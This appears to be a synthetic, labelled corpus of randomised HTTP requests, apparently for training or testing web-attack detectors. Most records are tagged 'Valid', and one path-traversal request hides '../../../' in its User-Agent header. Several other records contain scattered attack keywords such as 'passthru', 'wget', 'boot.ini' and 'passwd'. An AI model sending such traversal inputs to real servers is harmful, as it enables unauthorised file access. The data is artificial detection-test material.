UA-Pixels: 830x020
Via: 7.2 21.154.160.191, 1.4 www.su0ortlt.htm:7
Transfer-Encoding: deflate
Upgrade: rcbt/8.5, asrs/2.2, wsnl/5.1, trldRe/2.1
Warning: 291 136.225.173.99 "ihnTeaIeqrrr4vsorh" 
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 912151407
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42108
Start - Id: 10929
class: Valid
GET /cBfV5ht97hMonV1R2rM/afssZnCnCnqapO/humtezmhasnIhe/tiostlohktooP/y9C@Kc69P67Z6xuIF_A/a8Pg_f@4is9GGioAgrC7/yth-W5vkF/accept4/NAnuteqsOA4ypsmtB.mspx?reowadhgioaoh=tasjB7&hgi3e1q=nyKen&byEXqreadaorctu=88430&aeeouuow=%25uohl&Puxmaeroes=ei-si+8DdetuU%3Eee&sQh.pservices65Mt=rD5yazCe8Aw%7C+eeE&tqfefctbt9in=ec4&NLthtaReah6I7s=87070177 HTTP/1.1
Host: www.eYtc.com
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1255, iso-8859-9, x-mac-arabic, x-mac-japanese, koi8;q=0.6
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 184.123.19.129
Cookie: Qe641idlog=atD;ihd=6826445642
Cookie2: $Version="60"
Date: Sun, 03 Oct 04 02:30:17 UTC
ETag: W/"RUmme4YGUWFqlPX0riM4"
Expect: horu
From: dmnba@sipo.net
If-Modified-Since: Sun, 29 Apr 07 03:06:45 CET
If-Unmodified-Since: Sun, 16 Nov 08 24:05:43 CET
If-Match: "eZTHDke7p3k8163X"
If-None-Match: "oX-t61FUPUK_rLqQ5"
If-Range: Sun, 15 Nov 09 07:34:49 CET
Max-Forwards: 1
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: tg1rc8 Tsmlb9D=oHph1
Authorization: NTLM bnd0bnRybWJ3bmVlSUlOQ21vdGxhaHJyYXF2dGRFRnc=
Range: 588592-19738,0954-52796,229852-
Referer: /stTnvysE/na2ivnon/terqao/tof8Nsi/eceibdz7.jsp
TE: trailers,deflate;q=0.6,trailers
Trailer: If-Match
User-Agent: oGIumQmp http://www.eoamoYe.uk
UA-CPU: PowerPC
UA-Disp: 256,243,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5309x7001
Via: 9.9 185.238.117.216:2, 7.2 www.fFodsse.jpg:5751
Transfer-Encoding: identity
Upgrade: tbIe/2.5
Warning: 236 www.anncO0t.jpg "tlYaoiMnHeoasniuo" 
X-Forwarded-For: 213.119.25.206
X-Serial-Number: 847206508501943209
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10929
Start - Id: 45019
class: PathTransversal
PUT /DTEf1/.a18KhvXursb7telnet/tIj2xp__wdh6ASkdD/ovet/Fv/o_3-6FlW7knd2Dj0t/hitco5xe/Y4io.png? HTTP/1.1
Content-Length: 46
Content-Language: 5rTt
Content-Encoding: gzip
Content-Location: /esftgetn/ilcnlh.conf
Content-MD5: YXNzYTJlM3B2cnNjdHRjcA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 25 Dec 06 03:22:16 GMT
Last-Modified: Fri, 25 Dec 09 20:41:26 CET
Host: 111.59.37.162
Connection: tbann
Accept: */*;q=0.0
Accept-Charset: iso-8859-8;q=0.4, x-mac-korean;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Cookie: 6y4jer=tI_;H3ale7hglQmti=ct0lltseI;e1Ren=e3e3BlfPcl1m
Cookie2: $Version="39"
Date: Fri, 30 Mar 07 08:57:22 CET
ETag: "U_ur8zwGDcFU9al"
Expect: uod5egoi=rentst;aaeGst=ta56ge9a
If-Modified-Since: Sun, 25 Jan 09 18:29:02 UTC
If-Unmodified-Since: Fri, 17 Feb 06 18:08:37 GMT
If-Match: *
If-None-Match: "iolAdrYS16qJ5XPTgnt"
If-Range: "xY9yxcI93ZGE-5ve0M"
Max-Forwards: 541
Pragma: 3hra='uih'
Range: 1-,899478-
Referer: http://www.oiuiem.it/tristni.pl
TE: gzip
Trailer: TE
User-Agent: ../../../usr/dsqqdsqsd.xml
UA-Disp: 6080,526,32
UA-OS: FreeBSD
Via: FTP/1.1 6.192.70.216, 4.8 24.80.204.181
Transfer-Encoding: compress
X-Forwarded-For: 134.92.52.47
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cmtonenitcen4es=sAmTepne&Wg@httpsn_7s=38200364

End - Id: 45019
Start - Id: 30664
class: Valid
GET /e0u6lt/jbEoP/7t2irs3wtdhrSr/sOiuNQ/metaLHDcnTdrj4C/w2unF/slogejsy2Lteasrt/rekeef3i/aac.pl?ermDeSYO=smctentta&emrrerqtsue=aienull&hIKi4fvcf=3itmetaTor%2Fa&SetcX0g=oyDSpHnpG_qB&unast2snenzc=ekXxzIr&.sp7Q=2 HTTP/1.1
Host: www.tti3.net
Connection: close
Accept: image/png;q=0.4, image/png, video/*;q=0.5
Accept-Charset: windows-1255, macintosh;q=0.1
Accept-Encoding: 
Accept-Language: teTnpif-rsgG;q=0.6
Cache-Control: max-stale
Client-ip: 65.56.64.79
Cookie: ID9zHU9kI=h\between;2zplKJ=heN;tTCgsi1nErhw=iddxyy9oytEaJsi]srf
Cookie2: $Version="84"
Date: Fri, 11 Jan 08 10:57:29 UTC
ETag: W/"oh1wEY@upMY@dYuAu"
Expect: oaehehs
From: ceAnse@0hhlitFdht.fr
If-Modified-Since: Sat, 06 Nov 04 04:35:13 GMT
If-Unmodified-Since: Fri, 20 Apr 07 10:40:34 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 26 Jan 10 14:21:19 UTC
Max-Forwards: 597
MIME-Version: 1.3
Pragma: l=efwakt
Proxy-Authorization: otnae s4trl2e=Mefno
Authorization: Digest response="3201E4DceDa4DeAc62b809abB11E67E0"
Range: 69794-,-704
Referer: http://www.izhT.ch/9Tfot.tar.gz
TE: chunked,trailers,trailers
Trailer: Date
User-Agent: r3Im58NGv8 http://www.lellSnnC.gov
UA-CPU: PowerPC
UA-Disp: 7934,865,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 7462x1873
Via: FTP/6.1 www.asx0.css
Transfer-Encoding: gzip
Upgrade: eMR/0.4, Xw1Rp/0.0, t9se4/2.1, chf/5.5, oF4di/5.3
Warning: 045 162.99.200.1 "itsfee" 
X-Forwarded-For: 21.250.209.193
X-Serial-Number: 62673072943112918
----: ------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 30664
Start - Id: 6896
class: Valid
PUT /jelEeto2lh3agt/bOvar15R/ea0TDKBT8/edICdEx36kU/ox.8XHx2@F0wvLK/tUTW9CqaUfkF/smht3g9teenlimhi/lediFB4eYalC2RdTto.tiff? HTTP/1.0
Content-Length: 310
Content-Language: va,a5lp9to
Content-Encoding: compress
Content-Location: http://nomIgw3n.net/eeCm/koDsltn/Nemr/lentnt.aspx
Content-MD5: TG5HcW9yaWFmZTJ4bjBhZw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 11 Mar 07 24:32:41 CET
Last-Modified: Tue, 30 Mar 10 05:30:33 UTC
Host: www.HxCtlac.com
Connection: lfeydrgu
Accept: application/rtf
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: sr3w-aen;q=0.0, ig9eIk-a, r-ss, awerbi8b-s8ewsrrs
Cache-Control: max-age=7
Client-ip: 186.90.60.129
Cookie: Cn=7;elLhhooSIesfeT=rri/@Ghrtbeeogrubsuh
Cookie2: $Version="809"
Date: Fri, 19 Mar 10 24:03:40 GMT
ETag: W/"U9CMk.nN5QWdPt_"
Expect: oroaKar=mEieN
From: heaiiaa@e0fsn.com
If-Modified-Since: Sun, 10 Oct 04 16:02:48 CET
If-Unmodified-Since: Fri, 02 Jul 04 01:22:06 UTC
If-Match: "cfrovr8isy1aFnK8OR7"
If-None-Match: *
If-Range: *
Max-Forwards: 554
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic dGd2WnZvMDpydGVy
Authorization: 5lphu qaaamex=3IRdden8
Range: 326-
Referer: http://netsaao.cz/uedra/disho/nlee/thar/iaBg.cgi
TE: deflate,chunked
Trailer: If-Unmodified-Since
User-Agent: rfsbjbz http://www.tcamaml.st
UA-CPU: x86
UA-Disp: 6111,6409,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 496x5279
Via: HTTP/7.6 www.hertijmo.jpeg
Transfer-Encoding: gzip
Upgrade: tjeto/0.4, 3ft/7.1
Warning: 696 www.3huacir.htm "ddift7e" "Sun, 09 Oct 05 02:50:01 UTC"
X-Forwarded-For: 190.214.54.84
X-Serial-Number: 65434343667649
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

Cmrqfp=em9h%3Bpct&fp7-%u0=t+sIvysuteotheT&lc9Eatr8jn=3&rch8iwNcohetyea=irW&lt2on=dseaa%28a9Ohu%29window.open+%3E&uo2=e4%3Ea&Nwjorsxehaishhs=09275842&izxnhiseYsemb=im9satdewer&e8WPh9us.Yp=oertaRdim&Eebathzhe=hOn&umifrntfnyCorsd=eteLt&dqmo=seeg8aut&ievotbrabesm92=doglq80zb&isw5dsoEaoBdod=iNf_6sDXvwcj&anhil=3846

End - Id: 6896
Start - Id: 16629
class: Valid
GET /y1/i_8CGoH61/wS/Zey@_PEpEHtE/ptitnryicenezTesoxth/rAWY98Isysteme027/wxye3aeeomtsp6as/zst/owQpHGs1KoXZaQs/tLqSfu2smZyXOvudF/eQ3Ff-fwO_lKt8Ka3.sh? HTTP/1.1
Host: www.swTer6.net
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.7, compress;q=0.7, deflate;q=0.3, deflate
Accept-Language: *;q=0.1
Cache-Control: max-age=64
Client-ip: 180.147.224.253
Cookie: tSttsn=1;aomoo=nctw96T6ts;EiduAhnewf3e=nrocwdita;ai=and;mhmete=egroup byi0V8a)xot8t
Cookie2: $Version="330"
Date: Fri, 15 Jan 10 23:48:19 GMT
ETag: "dZGwfeTA3U@pruMwOh"
Expect: 100-continue
From: NuRe@6eea.cz
If-Modified-Since: Fri, 14 Sep 07 17:54:55 GMT
If-Unmodified-Since: Wed, 26 Apr 06 06:49:53 GMT
If-Match: *
If-None-Match: "LC.vZs3SDcmF.pzO"
If-Range: Wed, 13 Feb 08 01:09:17 UTC
Max-Forwards: 21
MIME-Version: 2.1
Pragma: ceesbErc=Ho
Proxy-Authorization: ttdia rghriOx=i1agttb
Authorization: mrmz5j ttjih=om0t4e
Range: -0
Referer: /ahahgd6.msf
TE: deflate;q=0.2,trailers
Trailer: From
User-Agent: ldt2Tn/1.9
UA-CPU: MIPS
UA-Disp: 8189,4167,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 702x893
Via: 0.6 www.w8rhp5rn.gif
Transfer-Encoding: compress
Upgrade: lte/0.8, ascmyo/0.4
Warning: 144 84.222.150.233 "udseldAuvnntiswe" "Tue, 18 Apr 06 02:19:07 UTC"
X-Forwarded-For: 128.243.180.188
X-Serial-Number: 6104122445139965688
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 16629
Start - Id: 24531
class: Valid
GET /s_57Z/cvobrnrcnMferh/edD/3XR-dgdh839bk/uDDQD6rcps.tiff?tkrsghoLk=riE6cEornuercnlk&ebo5Cent=7426467&Fedru=61&N.2.nullhw8BVX=8&omhm=oecho+iltn7&23a2=c&e7kemifiseoyuat=chtBoRoSUCPj&Insdw=do9tnode HTTP/1.1
Host: 235.239.239.39:04555
Connection: close
Accept: audio/basic, audio/basic;q=0.3, text/*;q=0.3
Accept-Charset: x-mac-chinesesimp, gb2312;q=0.2, euc-jp;q=0.9
Accept-Encoding: identity, deflate;q=0.8, identity
Accept-Language: ilarN-sTd
Cache-Control: no-cache
Client-ip: 218.219.114.119
Cookie: Sjrw8nssBmaRs=exec%-7n;usrOyQoptYPKBq=ene0igPp<[;ooelwjnaAn=713956;uu@tZdNI9=Aes9Facoa;ooy=ln7sijrtAtrwa
Cookie2: $Version="2"
Date: Sun, 22 Feb 04 08:43:11 GMT
ETag: W/"I6sJ9XSFVjVyl8@kdxf2"
Expect: istoce
From: leyen9ll@dgyc.uk
If-Modified-Since: Thu, 02 Apr 09 06:24:30 UTC
If-Unmodified-Since: Tue, 24 Jun 08 11:29:59 UTC
If-Match: "nH4u3BpW62o9UYU"
If-None-Match: "R.52MAB6hoNMmeQ7"
If-Range: Sun, 05 Aug 07 07:26:58 CET
Max-Forwards: 553
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: oser ouj1qmso=rgfwv
Authorization: eN1ags rcephuE=NRntto9m
Range: -85539,4-,9083-
Referer: /tnds/aeo9tkiH/nrshmozn/dgetGoie.mp3
TE: trailers,chunked;q=0.2
Trailer: If-Modified-Since
User-Agent: iewrefwvbftneamt4bmh
UA-CPU: Sparc
UA-Disp: 1408,616,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 303x667
Via: FTP/0.5 www.Kfii.css, FTP/0.4 www.e4oTsus.htm, esh5z/4.3 www.dLeetTA1.jpg
Transfer-Encoding: compress
Upgrade: prsuot/9.5, stt/6.8
Warning: 778 www.vdoea1nw.tiff "Hneestdd4eEZes" "Sun, 13 May 07 18:35:12 UTC"
X-Forwarded-For: 150.103.175.246
X-Serial-Number: 185732331097779
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24531
Start - Id: 5386
class: Valid
POST /nTTy8n/enXuT/cuorNnnfb/s.poAzTOKRun.shtml? HTTP/1.1
Content-Length: 95
Content-Language: s,1bidat,Euw2
Content-Encoding: gzip
Content-Location: /hlreea.css
Content-MD5: Mm9zM0xjaHQzMEEzdFdpUg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 15 Dec 04 10:35:07 CET
Last-Modified: Mon, 12 Jan 04 02:03:20 UTC
Host: 68.182.22.15
Connection: keep-alive
Accept: */*
Accept-Charset: isiri-3342
Accept-Encoding: deflate;q=0.2, identity, compress;q=0.1, deflate
Accept-Language: dTzyl46x-8mwumNoo, e-r;q=0.9, uae-todtmDuE, TYiic-uletc;q=0.5
Cache-Control: max-age=33
Client-ip: 49.138.242.29
Cookie: ceesis=widyaezrot;me=idi ;he6MCuty=1472;mwDelsrooa=toaatgontoNh
Cookie2: $Version="21"
Date: Sun, 27 Dec 09 07:33:40 CET
ETag: "Joimgnr.4XbEladE"
Expect: 100-continue
From: nojeamee@zitf6g.it
If-Modified-Since: Wed, 26 Dec 07 05:44:55 GMT
If-Unmodified-Since: Wed, 14 Feb 07 21:42:23 GMT
If-Match: "ePjMm5fjQUQC_QE"
If-None-Match: "xMDh3_BxQ5cZSxw"
If-Range: Thu, 29 Oct 09 21:43:37 UTC
Max-Forwards: 9
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Basic bWNlZUdjOm5nY2k0dGhh
Authorization: fes3 ohat=hztlna
Range: 429-04732,0-0702,6-47430
Referer: http://srioe.de/6aiulmmi/e5peve/6sni/rkagp.msf
TE: chunked,trailers
Trailer: Expect
User-Agent: lieogtertietZh6eata
UA-CPU: x86
UA-Disp: 725,766,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 237x186
Via: HTTP/2.1 www.VufI2os.shtml:807
Transfer-Encoding: identity
Upgrade: ieet/4.5, 8try/8.0, mey/0.5, rf5/8.0, hga/3.0
Warning: 111 www.ryaeFet.css "w2rhtt" 
X-Forwarded-For: 72.151.254.224
X-Serial-Number: 028740747069773
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

E6U9un=79&Th=hor9twbMqry9boih5&nib=e0eaEpshcoe&amrafrzutsor4e=@ib ttwherevbscriptmdaistyleoot

End - Id: 5386
Start - Id: 25754
class: Valid
GET /9svo/intytotlnaq/oNr-dK1J3P7CZ_/wgetHaa/obiGihtAlnlheSwe/awWMaKcAnrD.b2/eQqTIBfunWNfeuTe/SJandQ.hs8_execS/JDG5M/loYk_4A09Q5X-D/oql09neiRcmsr6bs.tiff? HTTP/1.1
Host: www.laaltre3sc.it
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: cp-936, x-mac-arabic;q=0.1, euc-cn;q=0.9, windows-1251, utf-8;q=0.8
Accept-Encoding: deflate;q=0.4, gzip, compress, compress, gzip;q=0.5
Accept-Language: *
Cache-Control: no-transform
Client-ip: 231.14.230.156
Cookie: moxwlnt6S2=aUyeiohtaccese3'n r;eqcnnoB=0393;f0aupiiidmc=I d4y;e rX+poie =t;n;ortp=)steee\E\oiafvnh;foidr=sllocation
Cookie2: $Version="38"
Date: Wed, 25 Feb 09 13:22:29 UTC
ETag: W/"KyQq33LfhFPbLrP6"
Expect: 100-continue
From: Fisonn33@rmkNOgAs.ch
If-Modified-Since: Sat, 16 Jun 07 22:32:20 CET
If-Unmodified-Since: Tue, 23 Feb 10 21:11:32 GMT
If-Match: *
If-None-Match: "bEHsdM-8UI75S2xiR"
If-Range: Mon, 25 Dec 06 06:56:14 UTC
Max-Forwards: 42
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM YXNTNjNlaG1hZWZmc2FDZTZhczR3aXJhNm13c25hYW9uaWlydGgza2Fz
Authorization: Digest algorithm=MD5
Range: 5458-41874
Referer: /HeEh/4pla.gif
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/1.3 (Windows; U; Win98 2.6; Rr-cp; rv:9.0.3) Gecko/55783029
UA-CPU: x86
UA-Disp: 281,591,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6588x200
Via: 0.6 246.35.251.95, HTTP/4.1 www.h9p0qo.html
Transfer-Encoding: compress
Upgrade: ceULo/2.9, itmu/9.5, m6nr5/9.3
Warning: 268 163.124.255.0 "nasf3oeerheogae" 
X-Forwarded-For: 249.109.166.6
X-Serial-Number: 960628745817709
----: ---------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 25754
Start - Id: 13456
class: Valid
GET /abl/oH6@LazzdP54UD3m/lkhYtrF@cb28G9w92aWq/tTEPeIbbRfOxfItd_aI/b2zalljnUinput/v9bTB_jHMphpQYs7B/m7Rlilterso5b5t/scriptZzazHlbN902N/S4cmdhap/MNuS4/GsHe.png?oez=72315&zdsfssnl=4+e%27n%7Er+%3Ce%3FEdimge%2B&an3=8huhg HTTP/1.0
Host: 168.24.195.167
Connection: close
Accept: */*
Accept-Charset: x-mac-roman;q=0.2
Accept-Encoding: deflate;q=0.3, compress;q=0.9
Accept-Language: *;q=0.6
Cache-Control: max-age=7
Client-ip: 208.189.220.255
Cookie: SmitjjeOaelea=L3nA0cgeylbp5tteo;n6re3iL9=il;eKdhttpskj=si1f;XOb2mperl92A0n=loo5 ahncxml;rae=887;wt2edsm8SSth=23
Cookie2: $Version="193"
Date: Wed, 21 Jul 04 19:33:37 UTC
ETag: W/"9cClyJiotc2LukdJQ6R"
Expect: noca7n=FghTo;dteutn=dfebu
From: rwsar@atw2syurH.be
If-Modified-Since: Thu, 11 Nov 04 20:33:55 UTC
If-Unmodified-Since: Sat, 25 Dec 04 01:49:11 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 16 Mar 10 10:54:18 CET
Max-Forwards: 5321
MIME-Version: 0.5
Pragma: e=qrcB
Proxy-Authorization: NTLM c29lb25mYXNyc25sc29uZUJkb2F4b2FlczBqRWxOck50cHJsaQ==
Authorization: Digest qop=auth
Range: -20257
Referer: /gg8bnaqt/5etc.bin
TE: trailers,gzip;q=0.5,trailers
Trailer: Accept-Encoding
User-Agent: 3sm3aq4/5.8.6.6
UA-CPU: x86
UA-Disp: 710,2643,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9732x9138
Via: 0.2 88.58.22.200, 4.6 201.135.200.176
Transfer-Encoding: gzip
Upgrade: bO6/2.7, oawf6h/2.0
Warning: 427 www.rhaeYhd.css "4AaAsesanea8" 
X-Forwarded-For: 37.38.29.200
X-Serial-Number: 564796261351412431
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13456
Start - Id: 18633
class: Valid
GET /IfzBboot.ini_sock_streambgsound3m6AC/aQzB/iB1Ct8Xdf.A/euydRTipM/a._ofqZX/rir0PJMlvkvWUWPjIG9D/ym7PiF@t2rwr7jYBB/eZwVTnfo/rTNFAaS/ycnnrep93ml/-Jvpositionv.cfm?0nFE=9184268539&ran8uL=2p5VqKK3d83&oh3roiu4c=o&8633eSlzear=3ili HTTP/1.1
Host: www.een9.be
Connection: nhoMilit
Accept: */*
Accept-Charset: iso-8859-1;q=0.8, isiri-3342;q=0.4, iso-10646-ucs-2;q=0.0, iso-8859-7;q=0.0
Accept-Encoding: deflate
Accept-Language: ii-me3, rts-n2, day9lat-e, bn-nelmii;q=0.0
Cache-Control: no-cache
Client-ip: 62.252.65.0
Cookie: seh0raykioRaaY=20453255;s0eghzsTgsi=uhtbn;se=9726441500
Cookie2: $Version="4"
Date: Sun, 01 Jul 07 02:01:42 UTC
ETag: W/"FtVc2EHXEHroTDw6OAEP"
Expect: 6Vteq
From: ddntue@tluT1lauo.gov
If-Modified-Since: Tue, 06 Apr 10 15:33:00 GMT
If-Unmodified-Since: Sun, 05 Oct 08 09:37:16 GMT
If-Match: *
If-None-Match: "2vbu.d4_fuUzjy5d9hU"
If-Range: Fri, 19 May 06 04:39:50 UTC
Max-Forwards: 1291
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Digest algorithm=etukCscs
Authorization: NTLM cW1pZGc0c3llbHd0ZWVFN2d1dHRwdDJpbmVlSW5GeHd5ZW93T3RsbG50YWh4aG91
Range: -0
Referer: http://uerO.it/hsprgt/rofuqjsg/estssV/nwvs.mpeg
TE: deflate;q=0.6,trailers
Trailer: Pragma
User-Agent: Mozilla/4.2 (Windows; U; Win 9x 9.9; hA-el; rv:1.2.5) Gecko/65155008
UA-CPU: x86
UA-Disp: 7139,4412,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 7882x967
Via: 9.5 www.rthhyl.shtml
Transfer-Encoding: xiseie
Upgrade: ndniu/9.9, rsSssn/8.8, bry2/5.0, aEnc/1.0
Warning: 871 165.27.62.53 "hetiwpovou9" 
X-Forwarded-For: 157.146.253.229
X-Serial-Number: 41593026
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18633
Start - Id: 8095
class: Valid
GET /DEX674rcpCsZ5/p_H.75B2RJhXWePQVQGO/uuI@cTRXe/DT/EhttpFYprocessing-instructionONmf5EpassthruFkdelete.jpg?tehioaarn=3&dctlhbaborknee=droef&8qdhpr9smrsn=sCoa&hetogtsmwg=passwdhw&jnet6joetc=hEeelieeiUa&ZNRvk8X1gBB=258904284&dt6rht=i HTTP/1.0
Host: www.ipsed6P0.be
Connection: keep-alive
Accept: image/gif;q=0.6
Accept-Charset: x-mac-arabic
Accept-Encoding: 
Accept-Language: itoac3V-4;q=0.6, oaxmus-ifahlneu;q=0.0, Samocssh-mte;q=0.5
Cache-Control: max-stale=0432
Client-ip: 16.152.221.65
Cookie: 0Rmtn=ete5connectneaoavtema;s9nLr=mtfrompI=G4htEetchildz;hWenhvdtae=1
Cookie2: $Version="9"
Date: Sat, 29 Sep 07 23:40:41 UTC
ETag: "FbNg3rQ5XAq7NChtYOgU"
Expect: 100-continue
If-Modified-Since: Mon, 04 Jul 05 22:15:54 GMT
If-Unmodified-Since: Sat, 27 May 06 14:03:08 GMT
If-Match: *
If-None-Match: "BkvJgdRt9NbaZrY"
If-Range: Thu, 21 Sep 06 07:26:33 GMT
Max-Forwards: 30
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Basic ZWNkSWllOndzam1xZQ==
Authorization: Basic dTNlaWhsOmxJb3luZWE=
Range: 96926-503180,-72
Referer: /yhTR6ov/oesl7caI/tteS/si32nara/enREe.asmx
TE: chunked,trailers
Trailer: Proxy-Authorization
User-Agent: 7dieeedleab
UA-CPU: x86
UA-Disp: 4009,1990,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 308x6685
Via: 1.4 www.aooaecrt.htm
Transfer-Encoding: eynU
Upgrade: ct84i/3.2, vnwu2/3.1, thbz/5.5
Warning: 302 121.74.121.140 "mk77oa" 
X-Forwarded-For: 20.60.245.141
X-Serial-Number: 74656
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8095
Start - Id: 7674
class: Valid
POST /t.zIX/Eq/rrSz7Q@SwiMVA/gld93/Boifi/werejwhcnhtecfrloY1.js? HTTP/1.1
Content-Length: 145
Content-Language: l,2r
Content-Encoding: identity
Content-Location: http://www.dgOsu.org/a5wtat.ace
Content-MD5: TW9lbHdHYmxsbGFpdHhuMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 29 Jul 05 07:38:45 UTC
Last-Modified: Mon, 01 Feb 10 08:40:03 UTC
Host: www.6d0caOt.be
Connection: close
Accept: image/jpeg;q=0.9, audio/*
Accept-Charset: x-mac-chinesesimp;q=0.2, windows-1254;q=0.3, euc-kr;q=0.9, x-mac-chinesesimp;q=0.8, iso-8859-4;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: Tae9oNri=hs2r
Client-ip: 41.206.202.253
Cookie: h0aTV4V=nODc;QQ7RL06rZMexec=89;lta4fe=9
Cookie2: $Version="6"
Date: Fri, 26 May 06 05:23:02 UTC
ETag: "jNEZGYjnAfqYvsykXK"
Expect: 100-continue
From: iein@nruizurNh.it
If-Modified-Since: Sat, 03 May 08 03:14:36 GMT
If-Unmodified-Since: Fri, 10 Dec 04 15:15:36 CET
If-Match: *
If-None-Match: "rSP6pjI-OU2CAqGJN"
If-Range: Sat, 14 Oct 06 04:28:40 CET
Max-Forwards: 4483
MIME-Version: 4.9
Pragma: rybVeDse=d
Proxy-Authorization: uocnn dT6my=esqesaq
Authorization: Digest cnonce="eNtto"
Range: -509831,17290-8114,40-042
Referer: http://www.luEtm.ch/dezLvE/rd3xi/VeWrA/wndwt.cfm
TE: deflate
Trailer: Accept
User-Agent: 56seowueoh/5.4.8.6.2
UA-CPU: StrongARM
UA-Disp: 5950,8626,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0413x678
Via: HTTP/3.3 244.215.235.106, 8.9 www.trrrtat.js
Transfer-Encoding: gzip
Upgrade: reasrf/4.1
Warning: 953 www.sgtzoeOm.png:0 "musiwDeiogabd1ld" "Fri, 16 Jan 04 11:28:31 GMT"
X-Forwarded-For: 116.49.9.190
X-Serial-Number: 71188820860
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

m9meclto=3594902315&eOtsfcs=dAuss&iIe=i1_bZ&ptciw3nlsea4bn=hte5at&ioaa=144019&matsfozz=hps%u&ozehlnhttcl=6823&Ibh-4zVaw=n>+&E3vriaawlsm=neh

End - Id: 7674
Start - Id: 20943
class: Valid
GET /sleAdrnoeoiso/tDjBiavOn7mmM/hri/doA1/dpwsdaWuSoes6hf8/agsiaE/cdSU8wCY/vImb_7otEOQ3sFXRRUV/caRf/ncOwlOj@I/FW@ADBQxrDfCx.nsf?rUrodccobg=rtbodyo&8@bodyh=nspua+Cmmonr+ygot&bodyGU9sKCnB1M=snfimgF&r7hsC8bhaleeu=1620&0yyEe=2&Tjvaru=te9imz3mfwiuiyel&vhrdotitn=csc%40cXO&Hf=-xn&x6nTDe=9284 HTTP/1.0
Host: www.siNrgl2ete.net
Connection: r9aret
Accept: application/rtf;q=0.0
Accept-Charset: hz-gb-2312, x-mac-korean;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 241.218.51.172
Cookie: cncabhzysafc2=28424;d7ttegR2=232
Cookie2: $Version="078"
Date: Sat, 17 Feb 07 15:15:19 UTC
ETag: "bA14LyW0QXKrVwIc0uq"
Expect: otnasaC
From: d011d@jsutlttae.it
If-Modified-Since: Sat, 05 Nov 05 04:16:15 UTC
If-Unmodified-Since: Sat, 22 Jul 06 01:39:54 GMT
If-Match: *
If-None-Match: "2U55OYQCCzeJkqL1"
If-Range: "0c.KseCGF2FSXKc@tzzb"
Max-Forwards: 08
MIME-Version: 7.9
Pragma: he='o0a'
Proxy-Authorization: NTLM dGZtU3JiZGludDNZeW5pZWFkb3d5QXRiYTByemVzdDlzcGxpdmVuaWhsVGU=
Authorization: Digest uri=/hahT9oo/aogao.htm
Range: -237,00-,0218-17
Referer: http://0sYsbses.net/oghhea/halen.asp
TE: chunked
Trailer: Connection
User-Agent: ienaE0a54e
UA-CPU: x86
UA-Disp: 289,3069,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2279x9563
Via: 2.5 114.108.65.146, 1.1 54.162.130.8:9029, 4.5 128.138.118.125:033
Transfer-Encoding: compress
Upgrade: de7/0.8, frcre/7.5
Warning: 810 71.224.48.238 "tio8scrsyxdd3fe" 
X-Forwarded-For: 251.229.233.197
X-Serial-Number: 2430605
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20943
Start - Id: 7252
class: Valid
POST /ofegaEehdyiper/qFpW/a0n-U/1.YPquIxzFhO/aoeYi/Wrcp95CGCz/xZi/EobjectPUnbh7M/rulKjrOERoY6mycm-/ecigdrhhtvaCS2/nJlJoAKEuJyqKdlJB@6/r3PU88CU2S0P5.js? HTTP/1.1
